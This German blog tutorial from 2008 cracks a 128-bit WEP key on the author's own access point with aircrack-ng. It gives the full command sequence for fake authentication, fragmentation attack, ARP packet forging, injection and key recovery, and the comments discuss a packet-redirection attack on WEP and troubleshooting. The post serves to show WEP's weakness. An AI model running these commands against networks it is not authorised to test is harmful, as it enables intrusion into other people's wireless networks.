Mrz 31 2008
[Tutorial] WEP gesichertes WLAN knacken (Fragmentation Attack)
Um zeigen zu können, wie unsicher WEP ist und wie schnell man an den Schlüssel kommt, habe ich meinen AccessPoint auf 128-Bit WEP umgestellt. Anschließend bin ich wie in der Anleitung unten beschrieben vorgegangen. Dauer des Vorgangs ca. 15 Minuten.
Informationen
BSSID des AP: 00:12:BF:46:68:BD
ESSID des AP: N3ur0m4nc3r
Kanal des AP: 01
MAC des WLAN-Adapters: 00:C0:CA:19:FF:86
WLAN-Adapter muss Packetinjection und
Monitor Mode unterstützen.
Als Betriebssytem habe ich Backtrack 3 verwendet, welches ich unter VMware installiert habe.
Beim Parameter 'bssid' bei 'airodump' müssen zwei '-' vorangestellt werden. Leider wandelt der Editor, mit dem ich die Blogeinträge schreibe, die beiden '-' zu einem um, so dass ich hier extra darauf hin weise.
Vorgang
- Bevor man anfängt, sollten natürlich die benötigten Treiber installiert und geladen sein. U.U. ist es erforderlich diese Treiber zu patchen, um bestimmte Funktionalitäten der Hardware nutzen zu können. Hierauf werde ich jetzt aber nicht weiter eingehen.
- Um Daten aus der Luft sniffen zu können, ist es erforderlich den Adapter in den Monitor Mode zu setzen. Dabei kann gleich schon der Kanal (in diesem Fall 1) angegeben werden.airmon-ng start wlan0 1
- Anschließend muss sich der Adapter mit dem AP verbinden, um eine Kommunikation zu ermöglichen.
Ich habe die Parameter für aireplay so gewählt, dass sich der Adapter alle 6000 Sekunden neu bei dem AP anmeldet und alle 10 Sekunden 'Keep-Alive-Pakete' sendet, damit die Verbindung gehalten wird.
Damit jeweils nur ein 'Keep-Alive-Paket' gesendet wird, ist hier der Parameter '-o 1' empfehlenswert.
Die Optionen '-e' und '-a' geben die ESSID und BSSID an.aireplay -1 6000 -q 10 -o 1 -e N3ur0m4nc3r -a 00:12:BF:46:68:BD wlan0
![image-thumb29 [Tutorial] WEP gesichertes WLAN knacken (Fragmentation Attack)](http://www.feldstudie.net/wp-content/uploads/2008/03/image-thumb29.png "Image Thumb29")
Bei der Fragmentierungs Attacke geht es darum, eine Datei zu bekommen, welche den keystream enthält. Mit dieser ist es einem zwar nicht möglich, den WEP-Schlüssel direkt zu bestimmen oder die gesendeten Pakete zu entschlüsseln, jedoch können damit Pakete generiert werden, die für die spätere Injektion benötigt werden.
Der Parameter '-5' gibt an, dass es sich um einen 'Fragmentation Attack' handelt, '-b' gibt die BSSID an und 'wlan0' das benutzte Interface.
Mittels '-h' wird die Quell-MAC in den Paketen gesetzt. Diese sollte die gleiche sein, wie die, die im Schritt zuvor verwendet wurde. Verwendet man die Option '-h' nicht, wird automatisch die MAC-Adresse des verwendeten WLAN-Adapters genutzt.aireplay-ng -5 -b 00:12:BF:46:68:BD wlan0
- Wie auf dem Bild zu erkennen haben ich nun eine Datei 'fragment-0331-104558.xor' erhalten, welche den keystream enthält. Mit dieser Datei und dem Programm 'packetforge-ng' ist es möglich, ein ARP-Paket zu erstellen, mit welchem ich 'injecten' und somit schneller die benötigten IVs sammeln kann.
-0 zeigt an, dass ich ein ARP-Paket generieren möchte
-a gibt die BSSID an
-k und -l die Quell- und Ziel-IP (die meisten APs reagieren auf die Broadcasts)
-y ist der Pfad zur xor Datei bzw. eben die Datei selbst
-w gibt den Dateinamen an, unter welchem das generierte Paket gespeichert wird
-h ist die MAC meines WLAN-Adapterspacketforge-ng -0 -a 00:12:BF:46:68:BD -k 255.255.255.255 -l 255.255.255.255 -y fragment-0331-104558.xor -w arp-request -h 00:C0:CA:19:FF:86
- Nun wird 'airodump' gestartet, um die Pakete mitlesen zu können, die durch meine 'Injection' generiert werden.
-c legt den Kanal fest, auf welchem gelauscht wird
--bssid erklärt sich wohl von selbst
-w gibt die Datei an, in welcher die Pakete gespeichert werdenairodump-ng -c 1 -bssid 00:12:BF:46:68:BD -w capture wlan0
- Jetzt starte ich das 'Injecten' mittels 'aireplay-ng'aireplay-ng -2 -r arp-request wlan0
- Nach einigen Minuten sollten genug Pakete gesammelt worden sein, um einen Angriff mittels 'aircrack-ng' auf den Schlüssel zu starten.
-a 1 gibt an, dass WEP-Schlüssel geknackt werden soll
-e ESSID des APs
-b BSSID des APs
und die Angabe der einzulesenden Dateienaircrack-ng -a 1 -e N3ur0m4nc3r -b 00:12:BF:46:68:BD *.cap
![image-thumb29 [Tutorial] WEP gesichertes WLAN knacken (Fragmentation Attack)](http://www.feldstudie.net/wp-content/uploads/2008/03/image35.png "Image Thumb29")
Ich habe bei einer 'Injection'-Rate von ca. 60 Paketen pro Sekunde nach ca. 10 Minuten >50.000 Pakete gehabt, so dass 'aircrack-ng' mit der relativ neuen PTW-Attacke erfolgreich war.
Spätestens jetzt sollte jeden klar sein, wie leicht WEP in einem Drahtlosnetzwerk angreifbar ist und warum man lieber auf WPA oder besser noch WPA2 umsteigen sollte.
In den nächsten Tagen werde ich noch einen Artikel über WPA schreiben, da auch WPA knackbar ist, sofern keine starken Passwörter verwendet werden.
weitere Informationen
32 Antworten bisher
Loading ...
Vorbildliches Tutorial
kurz, informativ, verständlich!
mr.pwnd bedankt sich herzlichst!
[...] cracken mit Fragmentation Attack In seinem Blog feldstudie.net hat Torsten Feld ein gutes Tutorial veröffentlicht. Es beschreibt, wie man mit aireplay, [...]
[...] auf meinem Artikel ‘WEP gesichertes WLAN knacken (Fragmentation Attack)‘ möchte ich nun mit diesem Beitrag aufzeigen, dass auch die WPA bzw. WPA2 [...]
[...] meisten Besucher finden zur Zeit über die aircrack-ng Wiki, auf welcher meine WEP-Hack und WPA-Hack-Tutorials verlinkt sind, auf diesen [...]
Hallo,
Ich bin eine Studentin und mache ein Projekt über WEP Schlüssel knacken.
Dazu soll ich ein Attack Pattern (Angriff-Muster) erstellen. Es soll allgemein gemacht werden. Ich habe einige Schritte gemacht und trotz soll mein Pattern falsch sein.
Deshalb habe ich google nachgelesen und habe die Anleitung von Ihnen gefunden. Soviel information hätte ich auch nicht für WEP Angriff von Ihre Anleitung finden können.
Können Sie mich bitte bei der erstellung des WEP Attack Pattern unterstürzen. Ich wäre Ihnen sehr dankbar.
Über die positive Antwort von Ihnen würde ich mich sehr freuen.
MfG
Priyaa
Hi Priyaa,
ich würde erstmal sagen, wir gehen zum 'Du' über.
Soweit ich kann, helfe ich natürlich gerne. Ist mit dem Attack Pattern einfach nur der Ablauf von der Handlung her gemeint oder was genau passiert (welche Pakete wie abgefangen oder gefaked werden müssen, etc.)? Schick mir doch sonst einfach mal das zu, was Du bereits hast und ich schaue es mir mal an.
Gruß, Torsten
Hallo ,
ich bin gerade dabei eine Seminararbeit über WEP zu schreiben. Ich muss im Rahmen dieser ein Paar Angriffe durchführen. Ein davon ist den AP dazu bringen mir (böser Angreifer;-) ) die Paketen und Anfragen von bereits ehrlichen und Authentifiziereten Host weiterzuleiten. Mit anderen Worten geht es darum den AP als Entschlüsselungsoracle zu missbrauchen. In der Airckrack-ng Sammlung sollte irgendwas geben. Bis jetzt leider ohne Erfolg.
Kann mir jemand helfen?
Danke im Voraus.
Hallo Renolds,
die Daten brauchen nicht vom AP weitergeleitet werden. Man sollte sie normalerweise direkt 'aus der Luft' mitsniffen können. Wenn zuvor der WEP-Schlüssel herausgefunden wurde, sollten die Daten auch Klartext sein. Oder habe ich Dich falsch verstanden?
Hallo Torsten,
zuerst danke ich dir für die rasche Antwort. Ich habe hier ein anders Szenario: nämlich ohne im Besitz des Schlüssels zu sein. Ein Ehrlicher Host sendet z. B. eine Anfrage an goole.de, also
Host A sendet an AP (im gleichen Netz und WEP ist aktiv)
"ping http://www.google.de", der AP entschlüsselt die Anfrage und leitet die normalerweise weiter an Google (Oder DNS Server). Hier kommt der Angriff (nämlich der AP leitet die Anfrage jetzt im Klartext an dem Angreifer).
Ich hoffe, das ich es erklären konnte.
Gruss
Das wird IMHO so nicht funktionieren, da die gesamte Funkübertragung mit WEP funktioniert.
Ich gehe doch richtig in der Annahme, dass der Angreifer auch über Funk arbeitet und nicht kabelgebunden, oder? Weil dann wäre es ja nur ein einfacher MITM-Angriff und hätte nichts mit WLAN zu tun.
Ansonsten wäre es bedeutend einfacher, erst den Schlüssel zu 'knacken' und dann den Verkehr mitzusniffen.
Hallo Torsten,
folgendes habe ich im Netz gefunden: Das beschreibt genau diesen Angriff.
Verschlüsselte Pakete umleiten:
Der Angreifer kann anstatt der Daten auch den Header eines Pakets manipulieren. Wenn er die Ziel-IP-Adresse eines Pakets so ändert, dass sie auf ein unter seiner Kontrolle stehendes System außerhalb des WLAN zeigt und das manipulierte Paket an den Access Point des WLAN schickt, wird dieser das Paket entschlüsseln und an das System des Angreifers schicken
Dieser ist unter:
http://entwickler.de/zonen/portale/psecom,id,99,news,35890,.html
zu finden.
Also es geht darum die IP im Header und die CRC anzupassen!
Ich weiß aber nur nicht wie!!
Gruss
Ein Kollege und ich haben uns mal grade WEP-verschlüsselte Pakete angeschaut. Auch der Header, in welchem die IPs, etc. enthalten sind, sind verschlüsselt.
Wie soll man die IPs spoofen können, wenn man sie nicht auslesen kann. Ohne das WEP-Passwort ist dies IMHO nicht möglich.
Hallo Torsten,
Nicht ganz, WEP beuntzt RC4 und die CRC 32. Aufgrund der Linearität der CRC Prüfsumme und Modulo 2 Rechnungen, können die Daten nur 0 und 1 sein. Nun kann ein Angreifer die IP ändern (Festlänge) und die CRC anpassen. Der AP merkt nichts von, da die Daten sowieso mit einem gültigen Stream verschlüsselt waren. Das ist die Theorie aber das klappt (Ich weiss nur nicht, wie ich das mit aircrack hinbekomme ). Wenn du willst schicke ich dir eine PDF Datei mit dem Beweis.
Gruss
Szenario:
Eigentliche Ziel adresse verschlüsselt:
00 11 01 11 00 (nur Bsp.) *
Angreifer kann durch einfachen XOR die IP änderen: Z. B. . Er möchte, dass die Daten auf 11 00 11 00 11 umgeleitet werden.
da addiert er einfach 11 11 10 11 11 zu * und schon steht er als Ziel im Header. Voraussetzung: Er muss die CRC anpassen damit der AP die Daten nicht dropt, entschlüsselt und an dem Angreifer weiterleitet. (Die Daten wurden von einem ehrlichen Host geschickt, d. h. der Keystream ist gültig und der AP nimmt dann die Daten an).
Ist der Prinzip zu einiger Maßen klar?
Jo, das Prinzip ist mir jetzt schon einigermaßen klar, würde mich dennoch freuen, wenn Du mir das PDF trotzdem mal zukommen lassen könntest. E-Mail-Adresse findest Du im Impressum.
Danke Dir schon mal im Vorraus.
Hallo Torsten,
ich wollte mal fragen, ob du was herausfinden konntest?
Gruss
Das Problem ist, dass ich Dein PDF noch nicht bekommen habe. Könntest Du es vielleicht nochmal schicken? An welche Adresse ist es denn gegangen?
Hallo Torsten,
Die email hatte ich an torsten@tortsen-feld.de geschickt.
Ich habe auch von Keinem E-mail-Server eine Fehlermeldung bekommen!.
Ich schicke dir die PDF an die Selbe Adresse nochmal.
Gruss
sorry verschrieben, torsten@torsten-feld.de
Ok, wollte grade schon nachfragen.
Habe die Datei gerade geschickt. Eine Frage: weisst du jetzt, ob dieser Angriff mit Aircrack realisieren lässt??.
Ich habe an folgendes Szenario gedacht:
- Angreifer Spooft den AP (somit bekommt er die Pakete), Paßt inden die IP und CRC und schickt die an den eigentlichen AP weiter. Dieser entschlüsselt die und schickt die weiter an dem Angreifer. Was denkst du?
Gruss
Hallo Torsten,
wollte mal fragen, ob du was gefunden hast?
Gruss
Habe die Datei immer noch nicht erhalten. Schicke das PDF bitte nochmal an torsten.feld@kaspersky.de
Danke.
Hallo Torsten,
Vielen dank für deinen beitrag, jedoch hab ich da schwirigkeiten. Hab es gerade an meinem eigenem netz versucht, bzw getestet..
bin bei schritt 4 hangen geblieben.
--> aireplay-ng -5 -b 00:12:BF:46:68:BD wlan0
die meldung kommt nach dem ich "y" eingegeben hab:
Sending fragmented packet
no answer, repaeating..
still nothing, trying another packet...
kannst du mir erklären wieso es nicht funktioniert? mache ich was falsch?
hier die genaue meldung(bin immernoch am versuchen:)):
Data packet found!
sending fragmented packet
not enough acks, repeating..
sending fragmented packet
no answer, repeating
trying a llc null packet
sending fragmented packet
no answer repeating
und und und... am schluss...
still nothing trying another packet..
read 92 packets... (was ich auch schon bis zu 600 hatte)
gruss
tarkan
Was ist das für ein Accesspoint, den Du 'knacken' möchtest und wie weit bist du von ihm entfernt?
es ist mein eigener,
Netopia 3347 Wireless router..
Ok, den kenne ich nicht. Bei neueren Accesspoints kann es allerdings möglich sein, dass es nicht ohne weiteres möglich ist. Zumindest nicht über diese Methode. Ein weiterer Faktor kann die Entfernung zum Accesspoint bzw. die Empfangsqualität sein. Bei zu schlechtem Empfang können die benötigten Pakete u.U. nicht empfangen werden.
http://board.protecus.de/t34622.htm - auf meiner Recherche bin ich noch über folgende Anleitung gestossen, die dieser sehr ähnlich ist.
gut wäre mal eine Liste mit Karten die funktionieren
@Jan: naja, habe mein Tutorial gut ein halbes Jahr vorher veröffentlicht. Aber sonst ein sehr schönes Tutorial.
hallo guten abend alles fit ? mal ne frage klappt das alles auch wirklich ? man sieht ja garnicht wie das programm heißt wo mit wep schlüssel bekommt und wo sie zu kriegen sind
@Script-Kiddie: Nein, natürlich funktioniert das alles nicht. Die ganzen Foren und Communities sind überflüssig, die Tutorials wurden erfunden und die Sicherheitsbedenken bzgl. WEP sind paranoid.
Die Namen der Tools stehen mehrfach im Artikel und selbst der Name der Suite ist sowohl in den Tags zu finden als auch nochmal extra verlinkt.
Habe den Nick mal auf einen Treffenderen geändert.
Und schreib nie wieder Kommentare unter meiner E-Mail-Adresse...